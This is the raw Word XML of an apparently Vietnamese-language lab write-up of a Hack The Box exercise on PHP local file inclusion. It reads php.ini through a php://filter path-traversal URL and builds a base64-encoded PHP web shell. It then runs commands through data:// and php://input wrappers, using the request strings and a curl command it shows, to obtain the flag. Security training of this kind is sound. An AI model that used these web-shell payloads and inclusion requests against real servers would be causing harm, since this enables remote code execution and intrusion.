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0135D" w14:textId="77777777" w:rsidR="00050DEE" w:rsidRDefault="00050DEE"/>
    <w:p w14:paraId="2761553F" w14:textId="4DCD24FF" w:rsidR="00050DEE" w:rsidRDefault="00050DEE">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00050DEE">
        <w:t>Try to gain RCE using one of the PHP wrappers and read the flag at /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76245453" w14:textId="03E1352E" w:rsidR="00050DEE" w:rsidRDefault="00050DEE">
      <w:r>
        <w:t xml:space="preserve">Đọc file php.ini </w:t>
      </w:r>
      <w:r w:rsidR="00F921CC">
        <w:t>kiểm tra xem allow_include_url có bật không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3127B2C1" w14:textId="69B3877A" w:rsidR="00450F0C" w:rsidRDefault="00450F0C">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB6EA43" w14:textId="5D3871FD" w:rsidR="00F74484" w:rsidRDefault="00450F0C">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00430C74">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://94.237.55.209:46618/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F4FDFF7" w14:textId="61640767" w:rsidR="00450F0C" w:rsidRDefault="00450F0C">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78E700" w14:textId="5B882AF0" w:rsidR="00450F0C" w:rsidRDefault="00450F0C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11E422D7" wp14:editId="59FCB6D6">
            <wp:extent cx="5943600" cy="3599180"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="993099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993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31D8" w14:textId="5A9A077B" w:rsidR="00450F0C" w:rsidRDefault="00450F0C">
      <w:r>
        <w:t>Ta thu được đoạn mã base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF810F9" w14:textId="66B5993A" w:rsidR="00450F0C" w:rsidRDefault="00450F0C">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319D8141" w14:textId="40CDFB89" w:rsidR="006B3EA3" w:rsidRDefault="006B3EA3">
      <w:r w:rsidRPr="006B3EA3">
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3EA3">
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3EA3">
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E77C189" w14:textId="27C01122" w:rsidR="00450F0C" w:rsidRDefault="00450F0C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475EC055" w14:textId="767606B5" w:rsidR="00450F0C" w:rsidRDefault="00450F0C">
      <w:r>
        <w:t>Giải mã đoạn base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115039A7" w14:textId="716B6B07" w:rsidR="00450F0C" w:rsidRDefault="006B3EA3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40F5E993" wp14:editId="210FFF3C">
            <wp:extent cx="5943600" cy="3977640"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="991220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00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F452" w14:textId="560B038E" w:rsidR="006B3EA3" w:rsidRDefault="006B3EA3">
      <w:r>
        <w:t>Ta thấy allow_url_include = On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6109D8E6" w14:textId="43A019E3" w:rsidR="00114819" w:rsidRDefault="00114819">
      <w:r>
        <w:t>Ta mã hóa base64 web shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF931ED" w14:textId="78034118" w:rsidR="00844DBC" w:rsidRDefault="00844DBC">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1491B1" w14:textId="77777777" w:rsidR="00844DBC" w:rsidRPr="00844DBC" w:rsidRDefault="00844DBC" w:rsidP="00844DBC">
      <w:r w:rsidRPr="00844DBC">
        <w:t>echo '&lt;?php system($_GET["cmd"]); ?&gt;' | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06585BA9" w14:textId="309EF96B" w:rsidR="00844DBC" w:rsidRDefault="00844DBC">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595AD3BC" w14:textId="537395F0" w:rsidR="00844DBC" w:rsidRDefault="00844DBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="144C0B81" wp14:editId="5CFB1CAD">
            <wp:extent cx="5438775" cy="857250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="42491272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2720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CB56" w14:textId="5C76BA84" w:rsidR="00EE2094" w:rsidRDefault="00EE2094">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553C1B7E" w14:textId="1FDD748F" w:rsidR="00EE2094" w:rsidRDefault="00EE2094">
      <w:r w:rsidRPr="00EE2094">
        <w:t>PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A7E45B" w14:textId="14BA66AA" w:rsidR="00EE2094" w:rsidRDefault="00EE2094">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0B2328" w14:textId="0E0003F7" w:rsidR="00BF4205" w:rsidRDefault="00BF4205">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">( thêm Mã hóa url (ctrl + U) ) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3A0F31" w14:textId="3FE0E4B2" w:rsidR="00FD0A4D" w:rsidRDefault="00FD0A4D">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20109204" w14:textId="3FF7102D" w:rsidR="00FD0A4D" w:rsidRDefault="00FD0A4D">
      <w:r w:rsidRPr="00FD0A4D">
        <w:t>PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ECFDDC" w14:textId="01EEB163" w:rsidR="00FD0A4D" w:rsidRDefault="00FD0A4D">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE032A9" w14:textId="5377B613" w:rsidR="006D1693" w:rsidRDefault="00BF4205">
      <w:r>
        <w:t>Dùng kĩ thuật data wapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328A6D9" w14:textId="3BAD510D" w:rsidR="00124FB4" w:rsidRDefault="00124FB4">
      <w:r>
        <w:t>Theo đề bài flag được đặt tại / nên ta sẽ liệt kê file và thư mục tại /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2E91DB" w14:textId="4484578B" w:rsidR="006D1693" w:rsidRDefault="006D1693">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5FEE2" w14:textId="121EA112" w:rsidR="006D1693" w:rsidRDefault="006D1693">
      <w:r w:rsidRPr="006D1693">
        <w:t>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&amp;cmd=ls+-l+/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02310C" w14:textId="4B6FBF57" w:rsidR="00EB7617" w:rsidRDefault="00EB7617">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333BDDAA" w14:textId="1AB39C60" w:rsidR="008E76C4" w:rsidRDefault="00EB7617">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3117E543" wp14:editId="717EFDF0">
            <wp:extent cx="5943600" cy="4321175"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="176594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8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3854" w14:textId="6776F314" w:rsidR="008E76C4" w:rsidRDefault="008E76C4">
      <w:r>
        <w:t>Tìm thấy file *.txt ta đọc file này và thu được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C937A62" w14:textId="3A052C55" w:rsidR="00EB7617" w:rsidRDefault="00EB7617">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73185074" w14:textId="2661AE08" w:rsidR="00EB7617" w:rsidRDefault="009C4D25">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="009C4D25">
        <w:t>index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&amp;cmd=cat+/37809e2f8952f06139011994726d9ef1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197F8E21" w14:textId="63148C92" w:rsidR="009C4D25" w:rsidRDefault="009C4D25">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECB61A" w14:textId="08E1756C" w:rsidR="007821DE" w:rsidRDefault="007821DE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C626F53" wp14:editId="36103283">
            <wp:extent cx="5943600" cy="3195955"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1456950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504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428B" w14:textId="49C910F4" w:rsidR="00B65F92" w:rsidRDefault="006E7A3D">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidR="00B65F92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A3D">
        <w:t>HTB{d!$46l3_r3m0t3_url_!nclud3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54477452" w14:textId="330E0FC8" w:rsidR="00B65F92" w:rsidRDefault="00B65F92">
      <w:r>
        <w:t>Test thử 2 kỹ thuật input wrapper và expect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166A050A" w14:textId="2D07BA87" w:rsidR="001D6FA2" w:rsidRPr="00734399" w:rsidRDefault="001D6FA2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00734399">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kỹ thuật input wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC2737" w14:textId="26C1E151" w:rsidR="001D6FA2" w:rsidRDefault="001D6FA2">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DEE216" w14:textId="6A418F19" w:rsidR="001D6FA2" w:rsidRDefault="001D6FA2">
      <w:r w:rsidRPr="001D6FA2">
        <w:t>curl -s -X POST --data '&lt;?php system($_GET["cmd"]); ?&gt;' "http://94.237.55.209:31203/index.php?language=php://input&amp;cmd=ls+-l+/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1DE883" w14:textId="2300D3BF" w:rsidR="001D6FA2" w:rsidRDefault="001105F8">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E7CD0" w14:textId="7E6378CB" w:rsidR="001105F8" w:rsidRDefault="00734399">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="491E0991" wp14:editId="3E6D59B1">
            <wp:extent cx="5943600" cy="664210"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="207655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56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FB6E" w14:textId="77777777" w:rsidR="00734399" w:rsidRDefault="00734399"/>
    <w:p w14:paraId="5FC6DD8E" w14:textId="77777777" w:rsidR="00734399" w:rsidRDefault="00734399"/>
    <w:p w14:paraId="6E3CEEB3" w14:textId="77777777" w:rsidR="00734399" w:rsidRDefault="00734399"/>
    <w:p w14:paraId="7A8C4F49" w14:textId="77777777" w:rsidR="00734399" w:rsidRDefault="00734399"/>
    <w:p w14:paraId="3E11F7E3" w14:textId="77777777" w:rsidR="00734399" w:rsidRDefault="00734399"/>
    <w:p w14:paraId="494E0E52" w14:textId="77777777" w:rsidR="00734399" w:rsidRDefault="00734399"/>
    <w:p w14:paraId="74DFA6E1" w14:textId="6CD9B3A1" w:rsidR="00734399" w:rsidRDefault="00734399">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76CD14E1" wp14:editId="077A1019">
            <wp:extent cx="5943600" cy="3605530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="153364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468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3D67" w14:textId="09B63E8D" w:rsidR="00734399" w:rsidRDefault="00734399">
      <w:r>
        <w:t xml:space="preserve">Ta cũng tìm ra đương file .txt chứa flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109B7871" w14:textId="1A5A1FF2" w:rsidR="00734399" w:rsidRDefault="00734399">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00514B0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kỹ thuật expect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392E688C" w14:textId="7D65363F" w:rsidR="00514B0E" w:rsidRDefault="00514B0E">
      <w:r>
        <w:t xml:space="preserve">Kiểm tra trong file php.ini có </w:t>
      </w:r>
      <w:r w:rsidR="0021618B">
        <w:t xml:space="preserve">được cấu hình </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sử dụng expect không </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7BD38" w14:textId="4CBCBF18" w:rsidR="000C72E8" w:rsidRDefault="000C72E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FFBD5B4" wp14:editId="29AFE3B9">
            <wp:extent cx="5943600" cy="3995420"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="152137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32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C9DB" w14:textId="02177DBD" w:rsidR="000C72E8" w:rsidRDefault="000C72E8">
      <w:r>
        <w:t>Không tim thấy extension=expect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF97A9C" w14:textId="1CF2AFFE" w:rsidR="00386E7B" w:rsidRPr="00514B0E" w:rsidRDefault="00386E7B">
      <w:r>
        <w:t xml:space="preserve">Nên không sử dụng được </w:t>
      </w:r>
      <w:r w:rsidR="00E124C8">
        <w:t>expect</w:t>
      </w:r>
      <w:r w:rsidR="000F1A03">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E124C8">
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E36C6C" w14:textId="56313708" w:rsidR="00734399" w:rsidRDefault="00734399"/>
    <w:sectPr w:rsidR="00734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484"/>
    <w:rsid w:val="00050DEE"/>
    <w:rsid w:val="000C72E8"/>
    <w:rsid w:val="000F1A03"/>
    <w:rsid w:val="001105F8"/>
    <w:rsid w:val="00114819"/>
    <w:rsid w:val="00124FB4"/>
    <w:rsid w:val="001D6FA2"/>
    <w:rsid w:val="0021618B"/>
    <w:rsid w:val="00386E7B"/>
    <w:rsid w:val="00450F0C"/>
    <w:rsid w:val="00514B0E"/>
    <w:rsid w:val="006B3EA3"/>
    <w:rsid w:val="006D1693"/>
    <w:rsid w:val="006E7A3D"/>
    <w:rsid w:val="00734399"/>
    <w:rsid w:val="007821DE"/>
    <w:rsid w:val="00844DBC"/>
    <w:rsid w:val="008705A0"/>
    <w:rsid w:val="008E76C4"/>
    <w:rsid w:val="00961CD2"/>
    <w:rsid w:val="009C4D25"/>
    <w:rsid w:val="00AD1D10"/>
    <w:rsid w:val="00B65F92"/>
    <w:rsid w:val="00BF4205"/>
    <w:rsid w:val="00BF5A6F"/>
    <w:rsid w:val="00CC3722"/>
    <w:rsid w:val="00E124C8"/>
    <w:rsid w:val="00EB7617"/>
    <w:rsid w:val="00EE2094"/>
    <w:rsid w:val="00F74484"/>
    <w:rsid w:val="00F921CC"/>
    <w:rsid w:val="00FD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6CF01"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6CF46D48-B349-4120-9321-3007C959A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F0C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00F74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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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0F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F0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F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F0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5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94.237.55.209:46618/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini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Quoc Khanh D21AT03</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ly Quoc Khanh D21AT03</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-01T14:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-02T03:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>